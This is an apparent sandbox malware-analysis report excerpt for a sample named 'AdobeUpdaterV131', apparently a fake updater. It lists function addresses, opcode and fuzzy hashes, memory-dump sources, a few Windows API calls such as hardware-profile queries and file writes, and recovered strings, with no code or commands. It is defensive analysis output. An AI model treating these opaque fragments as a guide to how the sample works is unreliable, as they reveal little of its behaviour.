Source File: 00000000.00000002.4135799516.0000000004F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f10000_AdobeUpdaterV131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 92659969a837042a94430d76798c2636a2664d37d98bc23675a551beed87806c
Instruction ID: 2a837d765585f96b643f9369906f01997b191741308e99946edfb1863aed1bf0
Opcode Fuzzy Hash: 92659969a837042a94430d76798c2636a2664d37d98bc23675a551beed87806c
Instruction Fuzzy Hash: C351E3EB30C125BDB112D0415B60AFA666EE7DA3307308036F507D6A61FE946ACB7431

Function 04F105BA Relevance: 1.8, APIs: 1, Instructions: 279
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.4135799516.0000000004F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f10000_AdobeUpdaterV131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 83598e4d3b823cdbb8c405fc19a8c49ca5287af79550ee1ba801b30bcd9b5cd8
Instruction ID: 321d7c32c23ebc74edb692da4f9cc38a58939cf103d449473876b3360c45d03d
Opcode Fuzzy Hash: 83598e4d3b823cdbb8c405fc19a8c49ca5287af79550ee1ba801b30bcd9b5cd8
Instruction Fuzzy Hash: 4651D3EB30C125BDB112D0415B60AFA666EE7DA370B308437F507D6A61FE946ACB7431

Function 04F10622 Relevance: 1.8, APIs: 1, Instructions: 269
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.4135799516.0000000004F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f10000_AdobeUpdaterV131.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b82e7a76f8134dfb2f55c973da4f2c064335866eff06fa061b0bc453a301a500
Instruction ID: 16f0b19c11d690aef4df7c41639b89cf80f95833c794942d15ff4559ddb0f834
Opcode Fuzzy Hash: b82e7a76f8134dfb2f55c973da4f2c064335866eff06fa061b0bc453a301a500
Instruction Fuzzy Hash: 2951E3AB30C125ADB212D0551B60AFA676EE7D6330B308077F407D6A61FA946ACB7431

Function 04F10607 Relevance: 1.8, APIs: 1, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4135799516.0000000004F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f10000_AdobeUpdaterV131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: ab018d0c31fb917553119a379a51aa1b54bcc297cc567dffd00d51e6c8860c71
Instruction ID: ec0a32494222de11eeaa402a4821b2da546519caefdc8fbbed36c4f4ed8df2a2
Opcode Fuzzy Hash: ab018d0c31fb917553119a379a51aa1b54bcc297cc567dffd00d51e6c8860c71
Instruction Fuzzy Hash: 5C51E3EB30C125BDB212D0515B60AFA666EE7D6330B308037F407D6A62FE946ACB7431

Function 04F1063F Relevance: 1.7, APIs: 1, Instructions: 247COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4135799516.0000000004F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f10000_AdobeUpdaterV131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 702dd0edbe73d0eb80f7a5ff9e76a42853bbedc82a92aee35430828ecf23f7e6
Instruction ID: c903059a9e0489806b3dd5b6d042bef97857c2f40ec1f928122277d2a6b078a1
Opcode Fuzzy Hash: 702dd0edbe73d0eb80f7a5ff9e76a42853bbedc82a92aee35430828ecf23f7e6
Instruction Fuzzy Hash: 3851F3EB30C125BDB212D0425B60AFA666EE7DA3307308077F507D6A61FE946ACB7431

Function 04F1064C Relevance: 1.7, APIs: 1, Instructions: 245COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4135799516.0000000004F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f10000_AdobeUpdaterV131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: ae4996b0bc1a88213143e27782f2eebd3eea8f8b773e7639e03581caa8a735db
Instruction ID: e17c3ca5986649721243af36706e7843d0244bfe48583b62b7d4be0d1a3200ab
Opcode Fuzzy Hash: ae4996b0bc1a88213143e27782f2eebd3eea8f8b773e7639e03581caa8a735db
Instruction Fuzzy Hash: C15104EB30C125BDB112D4411B60AFA666EE7DA3307308037F507C6A62FE946ACB7431

Function 04F10670 Relevance: 1.7, APIs: 1, Instructions: 239COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4135799516.0000000004F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f10000_AdobeUpdaterV131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 36923bb64480b13af5470ff85d4dca4219efb02467be85e527ee7cbfc531dedc
Instruction ID: 3092a6c61c072286f9280f8d75c87dc2c58f24aa6349fa3d078455d86fc3a59c
Opcode Fuzzy Hash: 36923bb64480b13af5470ff85d4dca4219efb02467be85e527ee7cbfc531dedc
Instruction Fuzzy Hash: 8A41E4EB30C125BDB112D0521B60AFA666EE7DA3307308077F507D6A62FE946ACB7431

Function 04F10663 Relevance: 1.7, APIs: 1, Instructions: 238COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4135799516.0000000004F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f10000_AdobeUpdaterV131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 1da2cb999cb798c1c588c66f4f938c649aca3626b7e9bf0ae7131a78786ed685
Instruction ID: 19ad5f34de1f02b3417ee2366734aabca962f08ed553c47f5c18f97616cc397a
Opcode Fuzzy Hash: 1da2cb999cb798c1c588c66f4f938c649aca3626b7e9bf0ae7131a78786ed685
Instruction Fuzzy Hash: 3B41F3EB30C125BDB11290421B60AFA666EE7DA3307308077F507D6E62FE946ACB7431

Function 04F106DB Relevance: 1.7, APIs: 1, Instructions: 229COMMON

Download Yara Rule

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 04F10767

Memory Dump Source

Source File: 00000000.00000002.4135799516.0000000004F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f10000_AdobeUpdaterV131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 1444055840fd287425e30e7b8ab3fb21671c05d0f9252c1f1f21ff1484744403
Instruction ID: d89f3ffeb7cd2d0d486d3da7bcb493b9ba325446ed99e8738e2f463c73df55cf
Opcode Fuzzy Hash: 1444055840fd287425e30e7b8ab3fb21671c05d0f9252c1f1f21ff1484744403
Instruction Fuzzy Hash: D74114AB30C125ADB112D4525BA0AFA666EE7DB3307304036F507DAA61FE946ACB7431

Function 04F106B4 Relevance: 1.7, APIs: 1, Instructions: 222COMMON

Download Yara Rule

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 04F10767

Memory Dump Source

Source File: 00000000.00000002.4135799516.0000000004F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f10000_AdobeUpdaterV131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 4d1cc689711ccf105b0e0d07578f82fd33967ab3ed8ae4b1aa9ca75f43bbcd09
Instruction ID: 49ac80a8a621a552cdc81c9be3e741ece02d46fc3870ee50387e0d88cc63186f
Opcode Fuzzy Hash: 4d1cc689711ccf105b0e0d07578f82fd33967ab3ed8ae4b1aa9ca75f43bbcd09
Instruction Fuzzy Hash: 804135E720C125BDB21294511B60AF66A6EE7DB3307304076F507CAA62FE946ACB7531

Function 04F10695 Relevance: 1.7, APIs: 1, Instructions: 214COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4135799516.0000000004F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f10000_AdobeUpdaterV131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 6f8c6240c1793ecdf109481ffd7745096a5221eb6e405984cd8775a27fe0ee4a
Instruction ID: ae60d15db38f7705f6bdddff05f587c70aefd08e9398cd257854321d95f52a01
Opcode Fuzzy Hash: 6f8c6240c1793ecdf109481ffd7745096a5221eb6e405984cd8775a27fe0ee4a
Instruction Fuzzy Hash: EB4126E730C129BDB11294511B61AFA6A6EE7DB3307304077F507CAA62FE946ACB7431

Function 04F106F2 Relevance: 1.7, APIs: 1, Instructions: 206COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4135799516.0000000004F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f10000_AdobeUpdaterV131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: f8e0d0e823a55398fb878a9f25884c09c203ff043983d89afa85b96a78d5250a
Instruction ID: 2552676b32c65704788bbddb2087e48eddfedf1c88baade30a133226ebc252d2
Opcode Fuzzy Hash: f8e0d0e823a55398fb878a9f25884c09c203ff043983d89afa85b96a78d5250a
Instruction Fuzzy Hash: 9E4123EB30C115BDB11290911B60AF6666EE7DB3307704036F507CAA62FED46ACB7431

Function 007121BC Relevance: 1.7, APIs: 1, Instructions: 198fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(?,00000000,00705DA7,?,00000000,00000000,00000000,?,00000000,?,006FB2D2,00705DA7,00000000,006FB2D2,?,?), ref: 00712341

Memory Dump Source

Source File: 00000000.00000002.4126912909.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.4126850330.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4126912909.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127757484.0000000000756000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.00000000008DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130057771.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130488174.0000000000BBC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130533106.0000000000BBD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130583463.0000000000BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130630894.0000000000BC1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_AdobeUpdaterV131.jbxd

Yara matches

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 7ae19bd9220b090cf7973e65e8bab8ce1da48512c6a55bb96bb1041c791cf1a9
Instruction ID: f17b05191795d8d76a2277bbfd3398e442245f5ce69f71360b9759c49eeabf86
Opcode Fuzzy Hash: 7ae19bd9220b090cf7973e65e8bab8ce1da48512c6a55bb96bb1041c791cf1a9
Instruction Fuzzy Hash: F161D571D04119AFDF01CFACD844EEE7BB9BF09304F150145E910AB292D379DAA2CBA0

Function 04F1071B Relevance: 1.7, APIs: 1, Instructions: 187COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4135799516.0000000004F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f10000_AdobeUpdaterV131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: e527b36be142bd2c6bcc65f7ab80727a36e0d0a8e217c574cb32c043c0bb833a
Instruction ID: 13446a29e19a20339f39240530d900978f126dc16badcfa5216711713e65cbba
Opcode Fuzzy Hash: e527b36be142bd2c6bcc65f7ab80727a36e0d0a8e217c574cb32c043c0bb833a
Instruction Fuzzy Hash: 964124E730C115BDB21290911BA0AF6676EE7DB3307304076F507CAA62FE946ACB7531

Function 04F1072E Relevance: 1.7, APIs: 1, Instructions: 182COMMON

Download Yara Rule

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 04F10767

Memory Dump Source

Source File: 00000000.00000002.4135799516.0000000004F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f10000_AdobeUpdaterV131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: e15d2f70ea23c700511ed1fc469c34857603044e18c3ee9474e0d28bfe1776c8
Instruction ID: 3c2bcb470d0f28f7a0152d44e644d3a3c104d474e0b2ac69305503e987a5ccd8
Opcode Fuzzy Hash: e15d2f70ea23c700511ed1fc469c34857603044e18c3ee9474e0d28bfe1776c8
Instruction Fuzzy Hash: 434135A730C115BDB21294511B61AF66B6EE7CB3307304076F507CAA62FED46ACB3131

Function 0068ACB0 Relevance: 1.6, APIs: 1, Instructions: 135COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 0068AE01

Memory Dump Source

Source File: 00000000.00000002.4126912909.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.4126850330.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4126912909.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127757484.0000000000756000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.00000000008DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130057771.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130488174.0000000000BBC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130533106.0000000000BBD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130583463.0000000000BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130630894.0000000000BC1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_AdobeUpdaterV131.jbxd

Yara matches

Similarity

API ID: Concurrency::cancel_current_task
String ID:
API String ID: 118556049-0
Opcode ID: 5f6501d9be5c228ccdbdf34a1afbcca321d78abc42ce241e78f29807ad35457f
Instruction ID: 35e277393f7ec240700f43a79d2dfe90b4e9cd2939f24a97c84722cd2ef124b1
Opcode Fuzzy Hash: 5f6501d9be5c228ccdbdf34a1afbcca321d78abc42ce241e78f29807ad35457f
Instruction Fuzzy Hash: 624116729001199BDB15EFA8DC806AEBBA6EF44301F1407AAFC04EB301D770DE119BD6

Function 00711832 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNEL32(00000000,00000000,CF830579,?,00711719,00000000,CF830579,0074FCB8,0000000C,007117D5,007058DD,?), ref: 00711888

Memory Dump Source

Source File: 00000000.00000002.4126912909.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.4126850330.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4126912909.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127757484.0000000000756000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.00000000008DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130057771.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130488174.0000000000BBC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130533106.0000000000BBD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130583463.0000000000BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130630894.0000000000BC1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_AdobeUpdaterV131.jbxd

Yara matches

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 3c840b58035e0320c6b68bc0c06a1558200d193d9ff7507cc00689ed4ccdf3a4
Instruction ID: b060e7e83493806178d5027612223b9ca6fa0ddb4acfbe895c3e118b8b6b10e2
Opcode Fuzzy Hash: 3c840b58035e0320c6b68bc0c06a1558200d193d9ff7507cc00689ed4ccdf3a4
Instruction Fuzzy Hash: 83116B336182545AD729237CA8067FE6B998F82738F75C229FE048F1D2EE6D9CC1C155

Function 0070AD7C Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(00000000,00000000,0074F970,006FB2D2,00000002,006FB2D2,00000000,?,?,?,0070AE86,00000000,?,006FB2D2,00000002,0074F970), ref: 0070ADB8

Memory Dump Source

Source File: 00000000.00000002.4126912909.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.4126850330.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4126912909.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127757484.0000000000756000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.00000000008DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130057771.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130488174.0000000000BBC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130533106.0000000000BBD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130583463.0000000000BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130630894.0000000000BC1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_AdobeUpdaterV131.jbxd

Yara matches

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 7631a2324c29ce7b9f6b2634291aa8b48fce0bab849f6dc18a87ad614e159a44
Instruction ID: 9cc85b85e0e1cef1be03aefa074a7ac16dfc637502aed28101156075bf1133eb
Opcode Fuzzy Hash: 7631a2324c29ce7b9f6b2634291aa8b48fce0bab849f6dc18a87ad614e159a44
Instruction Fuzzy Hash: CC010032614249EFCF098F59DC0589E3BA9DF81325F240208E8019B2D4EAB5ED828B90

Function 006FBFB1 Relevance: 1.6, APIs: 1, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00621FDE

Memory Dump Source

Source File: 00000000.00000002.4126912909.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.4126850330.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4126912909.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127757484.0000000000756000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.00000000008DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130057771.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130488174.0000000000BBC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130533106.0000000000BBD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130583463.0000000000BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130630894.0000000000BC1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_AdobeUpdaterV131.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID:
API String ID: 2659868963-0
Opcode ID: 96d8741c5bd1cb5ddfc9d0e52d750146dafe7f1ab02136646db99d30089cd677
Instruction ID: bbac18a713a3a742886b8e15ad3b3806dfc054ad4aa0ea084b2f934d9113bbbc
Opcode Fuzzy Hash: 96d8741c5bd1cb5ddfc9d0e52d750146dafe7f1ab02136646db99d30089cd677
Instruction Fuzzy Hash: 82014E7640470DB7C714AA95FC018A9B7DF9E023A0B508635FB14DA550FB70F5908BE5

Function 00713B4D Relevance: 1.5, APIs: 1, Instructions: 33memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,006FD39B,?,?,?,?,?,00622D8D,006FA41C,?,?,006FA41C), ref: 00713B80

Memory Dump Source

Source File: 00000000.00000002.4126912909.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.4126850330.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4126912909.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127757484.0000000000756000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.00000000008DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130057771.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130488174.0000000000BBC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130533106.0000000000BBD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130583463.0000000000BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130630894.0000000000BC1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_AdobeUpdaterV131.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 1ace3f477864d29675b7eef49c1443cd7697812f6d2f081aafe2e9ff9adf42c1
Instruction ID: d4f51742850a8e280c86644c7e58afc646a92b6c4dcfb4c17ca394d3adff5dc5
Opcode Fuzzy Hash: 1ace3f477864d29675b7eef49c1443cd7697812f6d2f081aafe2e9ff9adf42c1
Instruction Fuzzy Hash: 1AE0EDB1108321A6E730362D4C06BDB3689CB823B1F054668BC18960C1EB9CCEC081F4

Non-executed Functions

Function 006AAE60 Relevance: 20.2, APIs: 3, Strings: 8, Instructions: 970COMMON

Download Yara Rule

Strings

+Inf, xrefs: 006AB6C6
NaN, xrefs: 006AB5C9
gfff, xrefs: 006ABA6D
Inf, xrefs: 006AB6CF
-Inf, xrefs: 006AB6BF
`s, xrefs: 006AB151, 006AB3D9, 006AB483
+, xrefs: 006AB510
, xrefs: 006AB725, 006AB74E, 006AB7A2, 006AB7C7

Memory Dump Source

Source File: 00000000.00000002.4126912909.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.4126850330.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4126912909.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127757484.0000000000756000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.00000000008DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130057771.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130488174.0000000000BBC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130533106.0000000000BBD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130583463.0000000000BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130630894.0000000000BC1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_AdobeUpdaterV131.jbxd

Yara matches

Similarity

API ID:
String ID: $+$+Inf$-Inf$Inf$NaN$`s$gfff
API String ID: 0-2389460958
Opcode ID: 3621777f1104a9517aee0176c758efb0d85f00a5ddcca8a9a2395aa4b4d3fa4e
Instruction ID: 517233d721dd3b156385faf1ddc935ceccae28933d107f11b4f5b198ac7af5d3
Opcode Fuzzy Hash: 3621777f1104a9517aee0176c758efb0d85f00a5ddcca8a9a2395aa4b4d3fa4e
Instruction Fuzzy Hash: 4782AD71908B808FD725DF2884503ABBBE2AFDB344F08AA5EE4C997352D774CD458B42

Function 00639BC0 Relevance: 9.8, Strings: 6, Instructions: 2299COMMON

Download Yara Rule

Strings

<,u, xrefs: 00639FA8
<,u, xrefs: 00639F56
131, xrefs: 00639DEB, 00639DFB
type must be boolean, but is , xrefs: 0063BC31, 0063BC62, 0063BD25
%s|%s, xrefs: 00639E07
d+u, xrefs: 00639D46

Memory Dump Source

Source File: 00000000.00000002.4126912909.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

